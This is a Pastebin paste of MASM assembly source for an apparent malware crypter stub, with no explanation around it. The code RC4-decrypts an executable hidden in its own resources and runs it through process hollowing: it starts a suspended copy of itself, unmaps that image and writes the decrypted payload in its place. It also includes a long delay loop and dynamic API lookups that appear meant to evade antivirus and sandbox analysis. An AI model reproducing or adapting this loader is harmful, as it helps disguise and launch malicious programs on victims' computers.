Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ;Compiled with MASM
- .386
- .model flat, stdcall
- option casemap:none
- include \masm32\include\windows.inc
- include \masm32\include\kernel32.inc
- include \masm32\include\shell32.inc
- include \masm32\include\ntdll.inc
- include 123.inc
- includelib \masm32\lib\kernel32.lib
- includelib \masm32\lib\shell32.lib
- includelib \masm32\lib\ntdll.lib
- .code
- Rc4_setkey proc Pass:DWORD, LenPass:DWORD
- pushad
- mov eax, 0FFFEFDFCh
- mov ecx, 256/4
- Init_rc4keytable:
- mov dword ptr [rc4keytable+4*ecx-4], eax
- sub eax, 04040404h
- dec ecx
- jnz Init_rc4keytable
- xor eax, eax
- mov edi, Pass
- Key_return:
- xor ebx, ebx
- mov esi ,LenPass
- jmp New_key
- Key_loop:
- inc bl
- dec esi
- jz Key_return
- New_key:
- mov dl, byte ptr [rc4keytable+ecx]
- add al, byte ptr [edi+ebx]
- add al, dl
- mov dh, byte ptr [rc4keytable+eax]
- mov byte ptr [rc4keytable+ecx], dh
- mov byte ptr [rc4keytable+eax], dl
- inc cl
- jnz Key_loop
- popad
- ret
- Rc4_setkey endp
- Rc4_crypt proc iData:DWORD, LenData:DWORD
- pushad
- mov edi, LenData
- mov esi, iData
- test edi, edi
- jz Rc4_enc_exit
- xor eax, eax
- xor edx, edx
- xor ecx, ecx
- xor ebx, ebx
- Rc4_enc_loop:
- inc bl
- mov dl, byte ptr [rc4keytable+ebx]
- add al, dl
- mov cl, byte ptr [rc4keytable+eax]
- mov byte ptr [rc4keytable+ebx], cl
- mov byte ptr [rc4keytable+eax], dl
- add cl, dl
- mov cl, byte ptr [rc4keytable+ecx]
- xor byte ptr [esi], cl
- inc esi
- dec edi
- jnz Rc4_enc_loop
- xor eax, eax
- mov edi, offset rc4keytable
- mov ecx, 256/4
- cld
- rep stosd
- Rc4_enc_exit:
- popad
- ret
- Rc4_crypt endp
- getadress proc module:DWORD,funcion:DWORD
- LOCAL fh:HMODULE
- push module
- call LoadLibrary
- mov fh,eax
- push funcion
- push fh
- call GetProcAddress
- mov ebx,eax
- ;invoke FreeLibrary,fh
- ret
- getadress endp
- ExtractFile proc
- local hResource:dword
- LOCAL sinfo: STARTUPINFO
- LOCAL pinfo: PROCESS_INFORMATION
- LOCAL base: dword
- LOCAL sec: ptr IMAGE_SECTION_HEADER
- LOCAL cnt: CONTEXT
- push 256
- push offset mPath
- push 0
- call GetModuleFileName
- push 0
- call GetModuleHandle
- mov hInstance, eax
- invoke getadress,addr find1,addr find2
- mov temp,ebx
- push RT_RCDATA
- push 1212
- push hInstance
- call temp
- .if eax == 0
- invoke ExitProcess,0
- .else
- mov hResource, eax
- ;invoke SizeofResource, hInstance, hResource
- push hResource
- push hInstance
- call SizeofResource
- .if eax != 0
- mov hResourceSize, eax
- ;invoke LoadResource, hInstance, hResource
- push hResource
- push hInstance
- call LoadResource
- ; invoke getadress,find1,find8
- ;mov temp,ebx
- ;push hResource
- ;push hInstance
- ;call temp
- .if eax != 0
- invoke LockResource, eax
- mov ResInf , eax
- invoke lstrlen,addr password
- invoke Rc4_setkey,addr password,eax
- invoke Rc4_crypt,ResInf,hResourceSize
- invoke RtlZeroMemory, addr sinfo, sizeof STARTUPINFO
- ;invoke CreateProcess, offset mPath, 0, 0, 0, 0, CREATE_SUSPENDED, 0, 0, addr sinfo, addr pinfo
- invoke getadress,find1,find4
- mov temp,eax
- lea edx,pinfo
- push edx
- lea edx,sinfo
- push edx
- push 0
- push 0
- push CREATE_SUSPENDED
- push 0
- push 0
- push 0
- push 0
- push offset mPath
- call CreateProcess
- invoke RtlZeroMemory, addr cnt, sizeof CONTEXT
- mov cnt.ContextFlags, CONTEXT_INTEGER
- invoke GetThreadContext, pinfo.hThread, addr cnt
- ; invoke GetModuleHandle, 0
- push 0
- call GetModuleHandle
- ; invoke ZwUnmapViewOfSection, pinfo.hProcess, eax
- push eax
- push pinfo.hProcess
- call ZwUnmapViewOfSection
- mov edi, ResInf
- add edi, IMAGE_DOS_HEADER.e_lfanew[edi]
- assume edi: ptr IMAGE_NT_HEADERS
- invoke VirtualAllocEx, pinfo.hProcess, [edi].OptionalHeader.ImageBase, [edi].OptionalHeader.SizeOfImage, MEM_COMMIT + MEM_RESERVE, PAGE_EXECUTE_READWRITE
- mov base, eax
- ;invoke WriteProcessMemory, pinfo.hProcess, base, ResInf , [edi].OptionalHeader.SizeOfHeaders, 0
- invoke getadress,addr find1,addr find3
- mov temp,eax
- push 0
- push [edi].OptionalHeader.SizeOfHeaders
- push ResInf
- push base
- push pinfo.hProcess
- call temp
- lea eax, [edi].OptionalHeader
- mov sec, eax
- movzx eax, [edi].FileHeader.SizeOfOptionalHeader
- add sec, eax
- xor eax, eax
- xor esi, esi
- xor ecx, ecx
- .while ( si < [edi].FileHeader.NumberOfSections )
- imul eax, esi, sizeof IMAGE_SECTION_HEADER
- add eax, sec
- mov ebx, base
- add ebx, IMAGE_SECTION_HEADER.VirtualAddress[eax]
- mov edx, ResInf
- add edx, IMAGE_SECTION_HEADER.PointerToRawData[eax]
- invoke WriteProcessMemory, pinfo.hProcess, ebx, edx, IMAGE_SECTION_HEADER.SizeOfRawData[eax],0
- inc esi
- .endw
- mov eax, base
- add eax, [edi].OptionalHeader.AddressOfEntryPoint
- mov cnt.regEax, eax
- invoke SetThreadContext, pinfo.hThread, addr cnt
- invoke ResumeThread, pinfo.hThread
- ret
- .endif
- .endif
- .endif
- ExtractFile endp
- _entrypoint:
- mov loop_stopper,500000000
- loop_start:
- mov eax,0
- push eax
- pop eax
- cmp loop_stopper, 0
- dec loop_stopper
- jg loop_start
- invoke ExtractFile
- invoke ExitProcess, 0
- end _entrypoint
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement